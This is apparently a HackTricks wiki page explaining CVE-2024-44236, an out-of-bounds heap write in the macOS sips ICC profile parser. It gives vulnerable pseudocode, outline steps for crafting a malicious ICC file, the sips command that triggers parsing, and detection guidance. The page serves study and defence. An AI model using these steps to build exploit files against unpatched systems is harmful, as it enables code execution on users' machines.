HackTricksWWW2Exec - sips ICC Profile Out-of-Bounds Write (CVE-2024-44236)
Reading time: 3 minutes
tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Overview
An out-of-bounds write vulnerability in Apple macOS Scriptable Image Processing System (sips) ICC profile parser (macOS 15.0.1, sips-307) due to improper validation of the offsetToCLUT field in lutAToBType (mAB ) and lutBToAType (mBA ) tags. A crafted ICC file can trigger zero-writes up to 16 bytes past the heap buffer, corrupting heap metadata or function pointers and enabling arbitrary code execution (CVE-2024-44236).
Vulnerable Code
The vulnerable function reads and zeroes 16 bytes starting from an attacker-controlled offset without ensuring it lies within the allocated buffer:
// Pseudocode from sub_1000194D0 in sips-307 (macOS 15.0.1)
for (i = offsetToCLUT; i < offsetToCLUT + 16; i++) {
if (i > numberOfInputChannels && buffer[i] != 0)
buffer[i] = 0;
}
Only a check offsetToCLUT <= totalDataLength is performed. By setting offsetToCLUT == tagDataSize, the loop indexes up to 16 bytes past the end of buffer, corrupting adjacent heap metadata.
Exploitation Steps
-
Craft malicious
.iccprofile:- Build the ICC header (128 bytes) with signature
acspand a singlelutAToBTypeorlutBToATypetag entry. - In the tag table, set
offsetToCLUTequal to the tag'ssize(tagDataSize). - Place attacker-controlled data immediately after the tag data block to overwrite heap metadata.
- Build the ICC header (128 bytes) with signature
-
Trigger parsing:
sips --verifyColor malicious.icc -
Heap metadata corruption: The OOB zero-writes overwrite allocator metadata or adjacent pointers, allowing the attacker to hijack control flow and achieve arbitrary code execution in the context of the
sipsprocess.
Impact
Successful exploitation results in remote arbitrary code execution at user privilege on macOS systems running the vulnerable sips utility.
Detection
- Monitor file transfers on common protocols (FTP, HTTP/S, IMAP, SMB, NFS, SMTP).
- Inspect transferred files with signature
acsp. - For each
mABormBAtag, verify if theOffset to CLUTfield equals theTag data size. - Flag as suspicious if this condition is met.
References
- ZDI blog: CVE-2024-44236: Remote Code Execution Vulnerability in Apple macOS sips Utility
https://www.thezdi.com/blog/2025/5/7/cve-2024-44236-remote-code-execution-vulnerability-in-apple-macos - Apple October 2024 Security Update (patch shipping CVE-2024-44236)
https://support.apple.com/en-us/121564
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.